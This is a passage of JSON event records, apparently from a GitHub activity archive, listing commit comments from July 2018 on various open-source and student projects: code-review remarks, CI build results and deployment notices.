{} META-INF/MANIFEST.MF \\; | grep Automatic-Module-Name\r\nAutomatic-Module-Name: io.micronaut.aop\r\nAutomatic-Module-Name: io.micronaut.bom\r\nAutomatic-Module-Name: io.micronaut.buffer_netty\r\nAutomatic-Module-Name: io.micronaut.cli\r\nAutomatic-Module-Name: io.micronaut.core\r\nAutomatic-Module-Name: io.micronaut.discovery_client\r\nAutomatic-Module-Name: io.micronaut.function_aws\r\nAutomatic-Module-Name: io.micronaut.function\r\nAutomatic-Module-Name: io.micronaut.function_client\r\nAutomatic-Module-Name: io.micronaut.function_groovy\r\nAutomatic-Module-Name: io.micronaut.function_web\r\nAutomatic-Module-Name: io.micronaut.http\r\nAutomatic-Module-Name: io.micronaut.http_client\r\nAutomatic-Module-Name: io.micronaut.http_netty\r\nAutomatic-Module-Name: io.micronaut.http_server\r\nAutomatic-Module-Name: io.micronaut.http_server_netty\r\nAutomatic-Module-Name: io.micronaut.inject\r\nAutomatic-Module-Name: io.micronaut.inject_groovy\r\nAutomatic-Module-Name: io.micronaut.inject_java\r\nAutomatic-Module-Name: io.micronaut.management\r\nAutomatic-Module-Name: io.micronaut.router\r\nAutomatic-Module-Name: io.micronaut.runtime\r\nAutomatic-Module-Name: io.micronaut.runtime_groovy\r\nAutomatic-Module-Name: io.micronaut.validation\r\n```\r\n"}},"created_at":"2018-07-26T17:30:22Z"}
{"id":"8024154352","type":"CommitCommentEvent","actor":{"login":"guru-m"},"repo":{"name":"guru-m/angularcontroller"},"payload":{"comment":{"id":29847418,"position":null,"line":null,"path":null,"commit_id":"9e9e013917b90cc64d657a4e57cd9004beecd951","created_at":"2018-07-26T17:31:48Z","updated_at":"2018-07-26T17:31:48Z","author_association":"OWNER","body":"New commit in validation syntax 'Reviewed' "}},"created_at":"2018-07-26T17:31:48Z"}
{"id":"8024155523","type":"CommitCommentEvent","actor":{"login":"AlexWayfer"},"repo":{"name":"rubocop-hq/rubocop"},"payload":{"comment":{"id":29847422,"position":9,"line":539,"path":"config/default.yml","commit_id":"3051541018dd49318ce120edf34c512836d976ed","created_at":"2018-07-26T17:32:01Z","updated_at":"2018-07-26T17:32:01Z","author_association":"CONTRIBUTOR","body":"How `indentation width from Layout/IndentationWidth is used` by default? Where is `~` handling?"}},"created_at":"2018-07-26T17:32:01Z"}
{"id":"8024155923","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29847425,"position":null,"line":null,"path":null,"commit_id":"4ffda58151ac958e8947525f909adf00d4b09c56","created_at":"2018-07-26T17:32:07Z","updated_at":"2018-07-26T17:32:07Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-157](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-157).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-157-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-26T17:32:07Z"}
{"id":"8024157872","type":"CommitCommentEvent","actor":{"login":"cqbent"},"repo":{"name":"cqbent/masc-site"},"payload":{"comment":{"id":29847433,"position":null,"line":null,"path":null,"commit_id":"a30f3d665de8138f83f60874a8e5f12e639d3e36","created_at":"2018-07-26T17:32:29Z","updated_at":"2018-07-26T17:32:29Z","author_association":"OWNER","body":"Created multidev environment [masc-site#ci-80](https://dashboard.pantheon.io/sites/f42e5ac8-ed69-4d8a-ad5e-2220e369251f#ci-80).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-80-masc-site.pantheonsite.io/)"}},"created_at":"2018-07-26T17:32:29Z"}
{"id":"8024158919","type":"CommitCommentEvent","actor":{"login":"OtherCrashOverride"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29847443,"position":null,"line":null,"path":null,"commit_id":"99cc884513058e86fd18ee61901b48eb8fa97780","created_at":"2018-07-26T17:32:41Z","updated_at":"2018-07-26T17:32:41Z","author_association":"OWNER","body":"No.  Only the speed of PSRAM changed.  The LCD remains 40Mhz."}},"created_at":"2018-07-26T17:32:41Z"}
{"id":"8024162342","type":"CommitCommentEvent","actor":{"login":"rouault"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29847453,"position":null,"line":null,"path":null,"commit_id":"29c1d1ddbb68c3df0ecb41526adf45f36d78fd0a","created_at":"2018-07-26T17:33:23Z","updated_at":"2018-07-26T17:33:23Z","author_association":"MEMBER","body":"ok, reverting that then"}},"created_at":"2018-07-26T17:33:23Z"}
{"id":"8024166787","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29847466,"position":null,"line":null,"path":null,"commit_id":"d504b86df3f0d77cd6db848942e5f30b6316425a","created_at":"2018-07-26T17:34:19Z","updated_at":"2018-07-26T17:34:19Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/115"}},"created_at":"2018-07-26T17:34:19Z"}
{"id":"8024167186","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29847468,"position":null,"line":null,"path":null,"commit_id":"0f528f50618d211c1ada5bb6964e03f47a525280","created_at":"2018-07-26T17:34:24Z","updated_at":"2018-07-26T17:34:24Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/115"}},"created_at":"2018-07-26T17:34:24Z"}
{"id":"8024167484","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29847469,"position":null,"line":null,"path":null,"commit_id":"33b15c044f2901eeb5f6f36587f64b293b26143d","created_at":"2018-07-26T17:34:27Z","updated_at":"2018-07-26T17:34:27Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/115"}},"created_at":"2018-07-26T17:34:27Z"}
{"id":"8024167559","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29847470,"position":1,"line":1,"path":"app/views/users/index.html.erb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T17:34:28Z","updated_at":"2018-07-26T17:34:28Z","author_association":"NONE","body":"Entendo a utilidade deste arquivo para visualizar os usuarios, mas só quero ressaltar a falta de segurança que esta pagina gera, ainda mais sendo que sempre que um usuário é criado ele é redirecionado para esta pagina"}},"created_at":"2018-07-26T17:34:28Z"}
{"id":"8024167823","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29847471,"position":null,"line":null,"path":null,"commit_id":"dcab45eeb5656b0c3cdc7e4a91b62b62518a6664","created_at":"2018-07-26T17:34:32Z","updated_at":"2018-07-26T17:34:32Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/115"}},"created_at":"2018-07-26T17:34:32Z"}
{"id":"8024168477","type":"CommitCommentEvent","actor":{"login":"adeloucas"},"repo":{"name":"adeloucas/cltk"},"payload":{"comment":{"id":29847472,"position":93,"line":102,"path":"docs/akkadian.rst","commit_id":"db621d1cce2b481b5d581a05b0b7bceb2b55ac52","created_at":"2018-07-26T17:34:40Z","updated_at":"2018-07-26T17:34:40Z","author_association":"OWNER","body":"Fixed!"}},"created_at":"2018-07-26T17:34:40Z"}
{"id":"8024169371","type":"CommitCommentEvent","actor":{"login":"VinsB"},"repo":{"name":"VinsB/oc_project-0"},"payload":{"comment":{"id":29847475,"position":null,"line":null,"path":null,"commit_id":"8a06a457795d00eadaf3400764d3190c53cd9ba0","created_at":"2018-07-26T17:34:52Z","updated_at":"2018-07-26T17:34:52Z","author_association":"OWNER","body":"Leave this commit ; )"}},"created_at":"2018-07-26T17:34:52Z"}
{"id":"8024171379","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29847481,"position":null,"line":null,"path":null,"commit_id":"5f9a174b2a4ad8553db1ee412b6a7cab7b9b1d21","created_at":"2018-07-26T17:35:16Z","updated_at":"2018-07-26T17:35:16Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3727change](https://3727change-static-docs.pantheonsite.io/docs) Multidev environment:\n- [VERSION](https://github.com/pantheon-systems/documentation/commit/fcca2842ce259f339792ce8f1f846bd9390857ff/VERSION)\n- [docs/changelog/2018/07](https://3727change-static-docs.pantheonsite.io/docs/changelog/2018/07)\n- [source/_partials/changelog_preview.twig](https://github.com/pantheon-systems/documentation/commit/46d74ccc11fb3e9a367c74d9d1e49eff4927537e/source/_partials/changelog_preview.twig)\n"}},"created_at":"2018-07-26T17:35:16Z"}
{"id":"8024171736","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29847484,"position":null,"line":null,"path":null,"commit_id":"cd8f41aeab471832824c9c7ac9f1d4acabebd8ae","created_at":"2018-07-26T17:35:20Z","updated_at":"2018-07-26T17:35:20Z","author_association":"NONE","body":"Follow-up-to-#6393-SZVAV-for-PTUnit (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2946 of 2946 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cd8f41aeab471832824c9c7ac9f1d4acabebd8ae-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cd8f41aeab471832824c9c7ac9f1d4acabebd8ae-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T17:35:20Z"}
{"id":"8024173645","type":"CommitCommentEvent","actor":{"login":"Berkmann18"},"repo":{"name":"Berkmann18/sendgrid-nodejs"},"payload":{"comment":{"id":29847488,"position":null,"line":null,"path":null,"commit_id":"56d24faab262bd9c963de052322cdfadf7536a25","created_at":"2018-07-26T17:35:43Z","updated_at":"2018-07-26T17:35:43Z","author_association":"OWNER","body":"Note: `npm test` fails due to some package finding issue that I can't seem to resolve.\r\nC.f [PR #67](https://github.com/sendgrid/nodemailer-sendgrid-transport/pull/67) for some context."}},"created_at":"2018-07-26T17:35:43Z"}
{"id":"8024175094","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"aritode/ruby-reload"},"payload":{"comment":{"id":29847490,"position":6,"line":3,"path":"M-2/02_array.rb","commit_id":"e0293d32806c4decff3aee4ddcc16dc12c1eac38","created_at":"2018-07-26T17:36:01Z","updated_at":"2018-07-26T17:36:01Z","author_association":"NONE","body":"В принципе блок нам не нужен. step(5) и так вернет нам каждый пятый элемент, только не в виде массива, а в виде Range. Так-что нужно еще конертировать в массив.\r\n```\r\n(10...100).step(5).to_a\r\n```"}},"created_at":"2018-07-26T17:36:01Z"}
{"id":"8024175886","type":"CommitCommentEvent","actor":{"login":"vtrpldn"},"repo":{"name":"vtrpldn/bacharel"},"payload":{"comment":{"id":29847492,"position":null,"line":null,"path":null,"commit_id":"ceda7947ea38210d73098a5ac6d2660b9bc388cf","created_at":"2018-07-26T17:36:11Z","updated_at":"2018-07-26T17:36:11Z","author_association":"OWNER","body":"Fixes #2 "}},"created_at":"2018-07-26T17:36:11Z"}
{"id":"8024176038","type":"CommitCommentEvent","actor":{"login":"dantt775"},"repo":{"name":"pradel/react-responsive-modal"},"payload":{"comment":{"id":29847493,"position":null,"line":null,"path":null,"commit_id":"2ed570c33534a145b38f625788656856d6495ce7","created_at":"2018-07-26T17:36:13Z","updated_at":"2018-07-26T17:36:13Z","author_association":"NONE","body":"How change the image used in closeIcon? Thanks"}},"created_at":"2018-07-26T17:36:13Z"}
{"id":"8024177356","type":"CommitCommentEvent","actor":{"login":"AlexWayfer"},"repo":{"name":"rubocop-hq/rubocop"},"payload":{"comment":{"id":29847497,"position":9,"line":539,"path":"config/default.yml","commit_id":"3051541018dd49318ce120edf34c512836d976ed","created_at":"2018-07-26T17:36:28Z","updated_at":"2018-07-26T17:36:28Z","author_association":"CONTRIBUTOR","body":"OK, I think, manually (nohow): https://github.com/rubocop-hq/rubocop/commit/59e90e33bbad13e59711101d2f00fa60bc07b39d"}},"created_at":"2018-07-26T17:36:28Z"}
{"id":"8024177781","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"Hlcpereira/scripts"},"payload":{"comment":{"id":29847501,"position":null,"line":null,"path":null,"commit_id":"01c5bb1328cfb851094bfc169c6e8d85861065ed","created_at":"2018-07-26T17:36:33Z","updated_at":"2018-07-26T17:36:33Z","author_association":"NONE","body":"You can just give authorship instead of tagging "}},"created_at":"2018-07-26T17:36:33Z"}
{"id":"8024183506","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"aritode/ruby-reload"},"payload":{"comment":{"id":29847508,"position":24,"line":13,"path":"M-2/05_dates.rb","commit_id":"e0293d32806c4decff3aee4ddcc16dc12c1eac38","created_at":"2018-07-26T17:37:40Z","updated_at":"2018-07-26T17:37:40Z","author_association":"NONE","body":"да, или можно было сразу day отдать методу sum аргументом. Он тогда бы использовался как начальное значение. То есть\r\n```\r\nmonth.frist(month - 1).sum(day) \r\n```\r\nЭто все решение"}},"created_at":"2018-07-26T17:37:40Z"}
{"id":"8024184159","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29847511,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-26T17:37:48Z","updated_at":"2018-07-26T17:37:48Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-26T17:37:48Z"}
{"id":"8024184924","type":"CommitCommentEvent","actor":{"login":"Begasus"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29847513,"position":null,"line":null,"path":null,"commit_id":"b52dff5267a144de293c9c06f7b0102ee22258b4","created_at":"2018-07-26T17:37:57Z","updated_at":"2018-07-26T17:37:57Z","author_association":"CONTRIBUTOR","body":"libXcb needs libXau and libXdmcp in the latest changes, did you check those?"}},"created_at":"2018-07-26T17:37:57Z"}
{"id":"8024191589","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29847520,"position":null,"line":null,"path":null,"commit_id":"95f9c336eec9c755547bd64e8eadc1bcdcbe5508","created_at":"2018-07-26T17:39:19Z","updated_at":"2018-07-26T17:39:19Z","author_association":"COLLABORATOR","body":"Puzzle `1146-0cb0fd88` disappeared from [`src/main/groovy/com/zerocracy/stk/pmo/resumes/assign_examiner.groovy`](https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pmo/resumes/assign_examiner.groovy), that's why I closed #1352. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-26T17:39:19Z"}
{"id":"8024193451","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29847524,"position":null,"line":null,"path":null,"commit_id":"95f9c336eec9c755547bd64e8eadc1bcdcbe5508","created_at":"2018-07-26T17:39:42Z","updated_at":"2018-07-26T17:39:42Z","author_association":"COLLABORATOR","body":"Puzzle `1352-131ebec6` discovered in   [`src/main/groovy/com/zerocracy/stk/pmo/resumes/assign_examiner.groovy`](  https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pmo/resumes/assign_examiner.groovy)   and submitted as #1486. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-26T17:39:42Z"}
{"id":"8024198578","type":"CommitCommentEvent","actor":{"login":"waddlesplash"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29847530,"position":null,"line":null,"path":null,"commit_id":"b52dff5267a144de293c9c06f7b0102ee22258b4","created_at":"2018-07-26T17:40:40Z","updated_at":"2018-07-26T17:40:40Z","author_association":"MEMBER","body":"If the devel package is useless without those, then it should declare such a dependency."}},"created_at":"2018-07-26T17:40:40Z"}
{"id":"8024201874","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29847534,"position":34,"line":34,"path":"app/controllers/users_controller.rb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T17:41:15Z","updated_at":"2018-07-26T17:41:15Z","author_association":"NONE","body":"Alguma razão de ser usado toda esta logica do _respond_to with block_,  e esses _format_, não bastaria usar um `redirect_to @user, notice: 'Usuário criado com sucesso!'`\r\n\r\nAo meu ver da linha 31..34 poderia ser resumida em: \r\n```\r\n    if @user.save\r\n      sign_in\r\n      redirect_to @user, notice: 'Usuário criado com sucesso!'\r\n```\r\nO sign_in deve vir antes, pois o redirect_to chama o controller nesta construção\r\n\r\nNão precisa alterar, mas espero que fique claro a construção mais simples que era esperada, isto vale para todas essas chamadas desse _format_"}},"created_at":"2018-07-26T17:41:15Z"}
{"id":"8024212720","type":"CommitCommentEvent","actor":{"login":"vectorhacker"},"repo":{"name":"vectorhacker/pygeteventstore"},"payload":{"comment":{"id":29847563,"position":null,"line":null,"path":null,"commit_id":"b3fa2acb9bb450e037d3100a86021cc6eb2d2e4c","created_at":"2018-07-26T17:43:25Z","updated_at":"2018-07-26T17:43:25Z","author_association":"OWNER","body":"@blyxxyz sure thing. Any improvements or problems make sure to report an issue and I'll get back to you."}},"created_at":"2018-07-26T17:43:25Z"}
{"id":"8024213435","type":"CommitCommentEvent","actor":{"login":"adeloucas"},"repo":{"name":"adeloucas/cltk"},"payload":{"comment":{"id":29847569,"position":null,"line":null,"path":null,"commit_id":"db621d1cce2b481b5d581a05b0b7bceb2b55ac52","created_at":"2018-07-26T17:43:34Z","updated_at":"2018-07-26T17:43:34Z","author_association":"OWNER","body":"Can do! I'll upload edits for all comments upon adding this to the .rst file."}},"created_at":"2018-07-26T17:43:34Z"}
{"id":"8024222218","type":"CommitCommentEvent","actor":{"login":"shai95670"},"repo":{"name":"shai95670/SnakeGame"},"payload":{"comment":{"id":29847586,"position":null,"line":null,"path":null,"commit_id":"480f0a39fb0cfe4a3c700f291e3c86c6c6c01966","created_at":"2018-07-26T17:45:19Z","updated_at":"2018-07-26T17:45:19Z","author_association":"OWNER","body":"changed"}},"created_at":"2018-07-26T17:45:19Z"}
{"id":"8024224085","type":"CommitCommentEvent","actor":{"login":"TylerKirby"},"repo":{"name":"adeloucas/cltk"},"payload":{"comment":{"id":29847590,"position":18,"line":39,"path":"cltk/tokenize/line.py","commit_id":"db621d1cce2b481b5d581a05b0b7bceb2b55ac52","created_at":"2018-07-26T17:45:41Z","updated_at":"2018-07-26T17:45:41Z","author_association":"NONE","body":"I'd move it to akkadian since it's specific to akkadian, not tokenizers"}},"created_at":"2018-07-26T17:45:41Z"}
{"id":"8024233481","type":"CommitCommentEvent","actor":{"login":"emmett9001"},"repo":{"name":"Parsely/pykafka"},"payload":{"comment":{"id":29847610,"position":null,"line":null,"path":null,"commit_id":"858554029830e15cfa6d15df002d1772672d8ee0","created_at":"2018-07-26T17:47:32Z","updated_at":"2018-07-26T17:47:32Z","author_association":"MEMBER","body":"Unfortunately, this removal was only for the purpose of streamlining the README and doesn't correspond to any other code change. We still only test against rdkafka 0.9.1."}},"created_at":"2018-07-26T17:47:32Z"}
{"id":"8024235822","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29847620,"position":null,"line":null,"path":null,"commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T17:48:00Z","updated_at":"2018-07-26T17:48:00Z","author_association":"NONE","body":"Não sabia onde comentar exatamente, então deixarei aqui de forma generica... \r\n\r\nEstá bom o aplicativo, mas poderia estar um pouco melhor, sei que poderia ter colocado um pouco mais de cuidado... principalmente ao \"visual\" (por assim dizer) do código (não da view, isso realmente não importa, mas as questões de formatação/identação/padronização) e ao processo de versionamento do git. Curti a feature da imagem, e até mesmo o visual em si do site (que, novamente, não era necessário). Porém tem muitos problemas, por assim dizer de segurança... \r\n\r\nQualquer usuário pode deletar/editar o tweet de qualquer outro usuário, seria interessante se só o dono pudesse fazer isso... Num cenário mais real talvez teria aquilo que chamamos de authorization, que dá permissões diferentes para tipos diferentes de usuário, assim um admin poderia excluir todos, mas não editar, um usuario poderia dar permissão a outro para editar e assim por diante, mas isto não é necessário. Mas principalmente qualquer usuario pode editar e excluir qualquer outro usuário"}},"created_at":"2018-07-26T17:48:00Z"}
{"id":"8024236380","type":"CommitCommentEvent","actor":{"login":"hramos"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29847627,"position":null,"line":null,"path":null,"commit_id":"52a55fd8d106a15c72671475115c2ebe1f3ee57e","created_at":"2018-07-26T17:48:07Z","updated_at":"2018-07-26T17:48:07Z","author_association":"CONTRIBUTOR","body":"@vovkasm happy to look into it, but please be mindful of your language when referring to contributions here - even when they're auto-generated."}},"created_at":"2018-07-26T17:48:07Z"}
{"id":"8024237182","type":"CommitCommentEvent","actor":{"login":"crazyhappygame"},"repo":{"name":"cocos2d/cocos2d-x-external"},"payload":{"comment":{"id":29847636,"position":1,"line":1,"path":"tools/android_arm64_v8a_toolchain.cmake","commit_id":"da450bee0029bbb962250cf09dfcbdbaabf5d6e9","created_at":"2018-07-26T17:48:16Z","updated_at":"2018-07-26T17:48:16Z","author_association":"NONE","body":"Please remove it. It is already set to 1:)\r\nhttps://cmake.org/cmake/help/latest/variable/ANDROID.html"}},"created_at":"2018-07-26T17:48:16Z"}
{"id":"8024239598","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29847648,"position":null,"line":null,"path":null,"commit_id":"bf1e27e2cb2daa10d07460cb1447ed8ce2761c2e","created_at":"2018-07-26T17:48:46Z","updated_at":"2018-07-26T17:48:46Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2323 of 2323 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf1e27e2cb2daa10d07460cb1447ed8ce2761c2e-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf1e27e2cb2daa10d07460cb1447ed8ce2761c2e-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T17:48:46Z"}
{"id":"8024251353","type":"CommitCommentEvent","actor":{"login":"thazinthazin"},"repo":{"name":"thazinthazin/LaraApp"},"payload":{"comment":{"id":29847671,"position":null,"line":null,"path":null,"commit_id":"2fb8fd56dc40b0b986355af0597250527685404a","created_at":"2018-07-26T17:51:01Z","updated_at":"2018-07-26T17:51:01Z","author_association":"OWNER","body":"> we need to update zizaco/entrust migration command file under vendor directory."}},"created_at":"2018-07-26T17:51:01Z"}
{"id":"8024254715","type":"CommitCommentEvent","actor":{"login":"hawkw"},"repo":{"name":"sos-os/alarm"},"payload":{"comment":{"id":29847678,"position":36,"line":36,"path":"alarm-test/src/lib.rs","commit_id":"e1d03333e262c88c2abb59e6886dd20e007dea40","created_at":"2018-07-26T17:51:40Z","updated_at":"2018-07-26T17:51:40Z","author_association":"MEMBER","body":"This is not quite right. You want to take the _address_ of the frame, not the _value_ of the first byte. Since you can't cast a pointer to a mock address directly (as you saw in https://github.com/sos-os/alarm/issues/52#issuecomment-407961127), I think you'll have to do something like this:\r\n\r\n```rust\r\nfn base_address(&self) -> Self::Address {\r\n    MockFrame(self.frame[0] as *const _ as usize)\r\n}\r\n```\r\n\r\nBreaking it down:\r\n+ `self.frame[0]` returns a `&`-reference to the first element (in this case, the first byte) of `self.frame`\r\n  - We can't turn a `&`-reference into a number, since Rust only allows pointer arithmetic on raw pointers (`*const T` and `*mut T`)\r\n+ `as *const _` casts our `&u8` to a `*const u8` raw pointer. We can create raw pointers in safe Rust, but we're not allowed to _dereference_ them.\r\n+ `as usize` casts the raw pointer to a `usize`, giving us the address the `*const u8` is pointing to.\r\n+ Then, we can construct a `MockAddress` out of that `usize`"}},"created_at":"2018-07-26T17:51:40Z"}
{"id":"8024259620","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29847693,"position":null,"line":null,"path":null,"commit_id":"7b8a7a3ced3c76c27393c7129ed7f2434b207496","created_at":"2018-07-26T17:52:37Z","updated_at":"2018-07-26T17:52:37Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/101/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/101//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/7b8a7a3ced3c76c27393c7129ed7f2434b207496/101/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/7b8a7a3ced3c76c27393c7129ed7f2434b207496/101/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/7b8a7a3ced3c76c27393c7129ed7f2434b207496/101/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/7b8a7a3ced3c76c27393c7129ed7f2434b207496/101/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-26T17:52:37Z"}
{"id":"8024262058","type":"CommitCommentEvent","actor":{"login":"adeloucas"},"repo":{"name":"adeloucas/cltk"},"payload":{"comment":{"id":29847699,"position":18,"line":39,"path":"cltk/tokenize/line.py","commit_id":"db621d1cce2b481b5d581a05b0b7bceb2b55ac52","created_at":"2018-07-26T17:53:04Z","updated_at":"2018-07-26T17:53:04Z","author_association":"OWNER","body":"Good enough reason for me :) Moving!"}},"created_at":"2018-07-26T17:53:04Z"}
{"id":"8024262148","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29847700,"position":null,"line":null,"path":null,"commit_id":"0b7a8fad0493cebdd80fb1156ad7d00b40667b88","created_at":"2018-07-26T17:53:05Z","updated_at":"2018-07-26T17:53:05Z","author_association":"OWNER","body":"@samm82, no `return` is not correct.  If you look at the specification for load_params there is no output.  The input module has state variables that store this information.  The specification is for a module (not a template module), so the state variables are class variables in Python.  In other words, the input module is an example of a singleton.  There is only one.  You won't have multiple instances of Input objects.\r\n\r\nAn example you can look at is in my second year design course, Assignment 2:\r\n\r\nhttps://gitlab.cas.mcmaster.ca/smiths/se2aa4_cs2me3/blob/master/Assignments/A2/A2Soln/src/Data.py\r\n\r\nYou can look up a few folders to see the original specification.\r\n\r\n@niazim3 should be able to help you interpret this example, since she did this assignment.  😄 The nice thing for you is that you are getting a head start on the course you will soon be taking.  😄 \r\n\r\nDon't hesitate to ask if you have any questions.  I believe the documentation is internally consistent, but you might not know what part of the notation means.  It isn't fully formal, but it is close to being a formal/mathematical specification that can (some day) be automatically translated into code."}},"created_at":"2018-07-26T17:53:05Z"}
{"id":"8024262319","type":"CommitCommentEvent","actor":{"login":"ProSavage"},"repo":{"name":"ProSavage/SavageFactions"},"payload":{"comment":{"id":29847702,"position":null,"line":null,"path":null,"commit_id":"da329703894be981d5e0653b13b4d8d76c826ade","created_at":"2018-07-26T17:53:07Z","updated_at":"2018-07-26T17:53:07Z","author_association":"OWNER","body":"@VictorML11 feel free to make pull requests to my repository as I'll always take a look and apply lol"}},"created_at":"2018-07-26T17:53:07Z"}
{"id":"8024268769","type":"CommitCommentEvent","actor":{"login":"rajkosto"},"repo":{"name":"Atmosphere-NX/Atmosphere"},"payload":{"comment":{"id":29847718,"position":14,"line":83,"path":"fusee/fusee-secondary/src/key_derivation.c","commit_id":"78366098393d99402c13498409785b6a771937e1","created_at":"2018-07-26T17:54:18Z","updated_at":"2018-07-26T17:54:18Z","author_association":"CONTRIBUTOR","body":"keyblob is a nx_keyblob_t, missing a cast to unsigned char* here"}},"created_at":"2018-07-26T17:54:18Z"}
{"id":"8024269827","type":"CommitCommentEvent","actor":{"login":"superm1"},"repo":{"name":"hughsie/fwupd"},"payload":{"comment":{"id":29847725,"position":5,"line":250,"path":"plugins/thunderbolt/fu-plugin-thunderbolt.c","commit_id":"1443d5558ff5748804cb9bf0b5e305b247d6cbe3","created_at":"2018-07-26T17:54:28Z","updated_at":"2018-07-26T17:54:28Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-26T17:54:28Z"}
{"id":"8024271451","type":"CommitCommentEvent","actor":{"login":"superm1"},"repo":{"name":"hughsie/fwupd"},"payload":{"comment":{"id":29847727,"position":null,"line":null,"path":null,"commit_id":"1974de1b9c80eaf6507c4fa95bc4a15a4d62f607","created_at":"2018-07-26T17:54:44Z","updated_at":"2018-07-26T17:54:44Z","author_association":"COLLABORATOR","body":"Fixed"}},"created_at":"2018-07-26T17:54:44Z"}
